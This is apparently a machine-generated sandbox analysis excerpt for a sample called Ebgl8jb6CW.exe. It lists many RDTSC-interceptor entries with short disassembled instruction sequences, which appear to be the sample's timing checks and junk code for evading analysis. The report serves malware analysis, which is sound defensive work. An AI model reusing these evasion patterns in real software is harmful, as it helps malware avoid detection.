Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B525B second address: 3B527B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCA7480D346h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCA7480D351h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B56A0 second address: 3B56BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA74808086h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B56BE second address: 3B56EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D354h 0x00000009 pop eax 0x0000000a jl 00007FCA7480D366h 0x00000010 jo 00007FCA7480D34Ch 0x00000016 jnp 00007FCA7480D346h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3B56EC second address: 3B56F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA74808076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32E431 second address: 32E43C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FCA7480D346h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32E43C second address: 32E442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 32E442 second address: 32E44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB58B second address: 3BB590 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB111 second address: 3BB115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB115 second address: 3BB133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FCA74808076h 0x00000011 jmp 00007FCA7480807Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB133 second address: 3BB137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB137 second address: 3BB13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB13D second address: 3BB14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FCA7480D346h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3BB14B second address: 3BB157 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA74808076h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C3404 second address: 3C342C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D34Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FCA7480D34Dh 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C342C second address: 3C343C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA74808076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C343C second address: 3C3440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3745B9 second address: 3745E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA74808087h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FCA7480807Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3745E7 second address: 3745F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FCA7480D346h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C3723 second address: 3C3743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FCA74808084h 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C3743 second address: 3C374D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCA7480D346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C374D second address: 3C3751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C38EA second address: 3C390F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA7480D34Bh 0x00000008 jg 00007FCA7480D346h 0x0000000e jnl 00007FCA7480D346h 0x00000014 je 00007FCA7480D346h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C390F second address: 3C3915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C3915 second address: 3C391F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCA7480D346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3278C5 second address: 3278CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA74808076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3278CF second address: 3278D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C7992 second address: 3C79B1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA74808076h 0x00000008 jmp 00007FCA74808085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3C79B1 second address: 3C79BB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA7480D352h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3CB5C2 second address: 3CB5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3CB723 second address: 3CB731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D34Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D3935 second address: 3D3939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D184A second address: 3D1850 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D1B27 second address: 3D1B46 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCA74808076h 0x00000008 jo 00007FCA74808076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCA7480807Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D1E13 second address: 3D1E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D1E19 second address: 3D1E21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2197 second address: 3D219C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D219C second address: 3D21B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA74808081h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2769 second address: 3D27A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jns 00007FCA7480D35Ch 0x00000011 popad 0x00000012 push ecx 0x00000013 jmp 00007FCA7480D34Bh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2A55 second address: 3D2A6F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA74808078h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCA7480807Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2A6F second address: 3D2A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2D7B second address: 3D2D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D2D7F second address: 3D2D89 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA7480D346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D32E3 second address: 3D32F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FCA74808076h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D32F4 second address: 3D32FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D32FA second address: 3D331C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCA74808080h 0x00000008 jg 00007FCA74808076h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D331C second address: 3D3320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D3320 second address: 3D3326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3D7E8E second address: 3D7E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DABF9 second address: 3DAC07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA7480807Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DAD4F second address: 3DAD61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FCA7480D34Ch 0x0000000c js 00007FCA7480D346h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB369 second address: 3DB36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB531 second address: 3DB53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FCA7480D34Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB53E second address: 3DB544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB544 second address: 3DB563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA7480D355h 0x00000009 jns 00007FCA7480D346h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB563 second address: 3DB567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB567 second address: 3DB56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB56D second address: 3DB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA74808087h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3DB593 second address: 3DB5A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E18CE second address: 3E18D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E18D8 second address: 3E18F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCA7480D346h 0x0000000a jns 00007FCA7480D346h 0x00000010 jg 00007FCA7480D346h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E1E8B second address: 3E1E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCA74808076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E1E95 second address: 3E1E9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E1FE4 second address: 3E1FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E1FE8 second address: 3E1FEE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E0E85 second address: 3E0E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 335276 second address: 3352BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA7480D354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FCA7480D358h 0x0000000f jmp 00007FCA7480D353h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E9F06 second address: 3E9F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E9F0A second address: 3E9F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3E9F10 second address: 3E9F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3EA052 second address: 3EA067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA7480D346h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FCA7480D346h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3F4D03 second address: 3F4D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3FC908 second address: 3FC918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA7480D34Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 3FC918 second address: 3FC91C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4023FC second address: 402402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 402402 second address: 402406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 411152 second address: 411176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 ja 00007FCA7480D371h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCA7480D356h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4112A7 second address: 4112DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007FCA74808089h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4113F1 second address: 411412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FCA7480D358h 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 411412 second address: 41141D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FCA74808076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4116ED second address: 4116F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FCA7480D346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 411877 second address: 411892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA74808087h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 411A12 second address: 411A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FCA7480D346h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4123EB second address: 4123F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 415F9A second address: 415FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FCA7480D352h 0x0000000a jp 00007FCA7480D36Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCA7480D34Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 415FC4 second address: 415FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 415FC8 second address: 415FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 415FD4 second address: 415FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 4270FA second address: 427100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 427100 second address: 427106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 427106 second address: 427134 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCA7480D34Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c js 00007FCA7480D346h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007FCA7480D34Ch 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 426F62 second address: 426F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 428A70 second address: 428A86 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 ja 00007FCA7480D346h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FCA7480D346h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 428A86 second address: 428A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ebgl8jb6CW.exe	RDTSC instruction interceptor: First address: 428A8A second address: 428A8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
